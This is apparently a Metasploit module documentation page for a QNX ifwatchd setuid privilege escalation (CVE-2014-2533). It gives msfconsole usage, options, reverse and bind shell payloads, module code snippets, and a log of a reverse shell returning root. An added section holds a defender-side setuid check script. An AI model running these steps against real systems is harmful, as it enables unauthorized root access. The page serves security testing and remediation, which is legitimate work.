ifwatchd Privilege Escalation - Metasploit
This page contains detailed information about how to use the exploit/qnx/local/ifwatchd_priv_esc Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: ifwatchd Privilege Escalation
Module: exploit/qnx/local/ifwatchd_priv_esc
Source code: modules/exploits/qnx/local/ifwatchd_priv_esc.rb
Disclosure date: 2014-03-10
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2014-2533
This module attempts to gain root privileges on QNX 6.4.x and 6.5.x systems by exploiting the ifwatchd suid executable. ifwatchd allows users to specify scripts to execute using the '-A' command line argument; however, it does not drop privileges when executing user-supplied scripts, resulting in execution of arbitrary commands as root. This module has been tested successfully on QNX Neutrino 6.5.0 (x86) and 6.5.0 SP1 (x86).
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Basic Usage
Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.
msf > use exploit/qnx/local/ifwatchd_priv_esc
msf exploit(ifwatchd_priv_esc) > show targets
... a list of targets ...
msf exploit(ifwatchd_priv_esc) > set TARGET target-id
msf exploit(ifwatchd_priv_esc) > show options
... show and set options ...
msf exploit(ifwatchd_priv_esc) > set SESSION session-id
msf exploit(ifwatchd_priv_esc) > exploit
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Description
This module attempts to gain root privileges on QNX 6.4.x and 6.5.x systems by exploiting the ifwatchd suid executable.
Vulnerable Application
ifwatchd allows users to specify scripts to execute using the -A command line argument; however, it does not drop privileges when executing user-supplied scripts, resulting in execution of arbitrary commands as root.
This module has been tested successfully on:
- QNX Neutrino 6.5.0 (x86)
- QNX Neutrino 6.5.0 SP1 (x86)
QNX Neutrino 6.5.0 Service Pack 1 is available here:
- http://www.qnx.com/download/feature.html?programid=23665
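The module's check() decides purely on whether the ifwatchd binary carries the setuid bit, and that is also the property an administrator verifies after remediating a host. The POSIX shell helper below is an added example, not code from the Metasploit module or from this page: it applies the same test from the defender's side and reports the verdict the module's check would reach (Safe or Detected), plus the one-line remediation. The default path /sbin/ifwatchd is an assumption taken from the "Executing /sbin/ifwatchd..." line in the Scenarios output; pass another path as the first argument if the binary lives elsewhere.

```shell
#!/bin/sh
# Added example, not part of the Metasploit module or the original page.
# Defender-side counterpart of the module's check(): the module returns
# CheckCode::Detected only when the ifwatchd binary has the setuid bit set.
# DEFAULT_PATH is an assumption taken from the page's Scenarios output
# ("Executing /sbin/ifwatchd...").
DEFAULT_PATH=/sbin/ifwatchd

# Succeeds (exit 0) only when the file exists and has the setuid bit set,
# i.e. the condition the module's "setuid? ifwatchd_path" test looks for.
ifwatchd_is_setuid() {
    f="${1:-$DEFAULT_PATH}"
    [ -f "$f" ] && [ -u "$f" ]
}

# Maps the file state to the verdict the module's check() would reach.
# Prints exactly one of: missing | detected | safe. Always returns 0 so it
# can be called at top level without tripping a caller's "set -e".
ifwatchd_verdict() {
    f="${1:-$DEFAULT_PATH}"
    if [ ! -f "$f" ]; then
        echo missing
    elif ifwatchd_is_setuid "$f"; then
        echo detected
    else
        echo safe
    fi
}

# Human-readable report built on the verdict above.
ifwatchd_report() {
    f="${1:-$DEFAULT_PATH}"
    case "$(ifwatchd_verdict "$f")" in
        missing)  echo "$f: not present on this host" ;;
        detected) echo "$f: setuid bit set (module check would return Detected)"
                  echo "  mitigation: remove the bit with 'chmod u-s $f' and re-run this check" ;;
        safe)     echo "$f: no setuid bit (module check would return Safe)" ;;
    esac
}

ifwatchd_report "$@"
```

Run it as root on the QNX host with no arguments, or point it at a copy of the binary. Removing the setuid bit is what turns the module's verdict from Detected to Safe; confirm with the vendor whether ifwatchd needs elevated privileges for its normal interface-monitoring duties on your release before leaving the bit off permanently.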
Verification Steps
- Start msfconsole
- use exploit/qnx/local/ifwatchd_priv_esc
- set session <ID>
- run
- You should get a root session
Options
SESSION
Which session to use; sessions can be listed with the sessions command.
WritableDir
A writable directory file system path. (default: /tmp)
Scenarios
msf5 > use exploit/qnx/local/ifwatchd_priv_esc
msf5 exploit(qnx/local/ifwatchd_priv_esc) > set session 1
session => 1
msf5 exploit(qnx/local/ifwatchd_priv_esc) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(qnx/local/ifwatchd_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.188:4444
[*] Writing interface arrival event script...
[*] Executing /sbin/ifwatchd...
[*] Command shell session 2 opened (172.16.191.188:4444 -> 172.16.191.215:65500) at 2018-03-22 15:18:48 -0400
id
uid=100(test) gid=100 euid=0(root)
uname -a
QNX localhost 6.5.0 2012/06/20-13:50:50EDT x86pc x86
Msfconsole Usage
Here is how the qnx/local/ifwatchd_priv_esc exploit module looks in the msfconsole:
msf6 > use exploit/qnx/local/ifwatchd_priv_esc
[*] Using configured payload cmd/unix/reverse_awk
msf6 exploit(qnx/local/ifwatchd_priv_esc) > show info
Name: ifwatchd Privilege Escalation
Module: exploit/qnx/local/ifwatchd_priv_esc
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2014-03-10
Provided by:
cenobyte
Tim Brown
bcoles <[email protected]>
Available targets:
Id Name
-- ----
0 Automatic
Check supported:
Yes
Basic options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
Payload information:
Space: 1024
Avoid: 0 characters
Description:
This module attempts to gain root privileges on QNX 6.4.x and 6.5.x
systems by exploiting the ifwatchd suid executable. ifwatchd allows
users to specify scripts to execute using the '-A' command line
argument; however, it does not drop privileges when executing
user-supplied scripts, resulting in execution of arbitrary commands
as root. This module has been tested successfully on QNX Neutrino
6.5.0 (x86) and 6.5.0 SP1 (x86).
References:
https://nvd.nist.gov/vuln/detail/CVE-2014-2533
http://www.securityfocus.com/bid/66449
https://www.exploit-db.com/exploits/32153
http://seclists.org/bugtraq/2014/Mar/66
Module Options
This is a complete list of options available in the qnx/local/ifwatchd_priv_esc exploit:
msf6 exploit(qnx/local/ifwatchd_priv_esc) > show options
Module options (exploit/qnx/local/ifwatchd_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Payload options (cmd/unix/reverse_awk):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Advanced Options
Here is a complete list of advanced options supported by the qnx/local/ifwatchd_priv_esc exploit:
msf6 exploit(qnx/local/ifwatchd_priv_esc) > show advanced
Module advanced options (exploit/qnx/local/ifwatchd_priv_esc):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                10               no        Additional delay in seconds to wait for a session
   WritableDir             /tmp             yes       A directory where we can write files

Payload advanced options (cmd/unix/reverse_awk):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the qnx/local/ifwatchd_priv_esc module can exploit:
msf6 exploit(qnx/local/ifwatchd_priv_esc) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the qnx/local/ifwatchd_priv_esc exploit:
msf6 exploit(qnx/local/ifwatchd_priv_esc) > show payloads
Compatible Payloads
===================

   #  Name                          Disclosure Date  Rank    Check  Description
   -  ----                          ---------------  ----    -----  -----------
   0  payload/cmd/unix/bind_awk                      normal  No     Unix Command Shell, Bind TCP (via AWK)
   1  payload/cmd/unix/generic                       normal  No     Unix Command, Generic Command Execution
   2  payload/cmd/unix/reverse_awk                   normal  No     Unix Command Shell, Reverse TCP (via AWK)
Evasion Options
Here is the full list of possible evasion options supported by the qnx/local/ifwatchd_priv_esc exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(qnx/local/ifwatchd_priv_esc) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
<IFWATCHD_PATH> is not setuid
Here is a relevant code snippet related to the "<IFWATCHD_PATH> is not setuid" error message:
    datastore['WritableDir']
  end

  def check
    unless setuid? ifwatchd_path
      vprint_error "#{ifwatchd_path} is not setuid"
      return CheckCode::Safe
    end
    vprint_good "#{ifwatchd_path} is setuid"

    CheckCode::Detected
Target not vulnerable
Here is a relevant code snippet related to the "Target not vulnerable" error message:
    CheckCode::Detected
  end

  def exploit
    unless check == CheckCode::Detected
      fail_with Failure::NotVulnerable, 'Target not vulnerable'
    end

    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end
Session already has root privileges
Here is a relevant code snippet related to the "Session already has root privileges" error message:
    unless check == CheckCode::Detected
      fail_with Failure::NotVulnerable, 'Target not vulnerable'
    end

    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end
<BASE_DIR> is not writable
Here is a relevant code snippet related to the "<BASE_DIR> is not writable" error message:
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    script_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"

    print_status 'Writing interface arrival event script...'
Related Pull Requests
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #11234 Merged Pull Request: revisionism
- #9745 Merged Pull Request: Add ifwatchd Privilege Escalation exploit module
Authors
- cenobyte
- Tim Brown
- bcoles
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.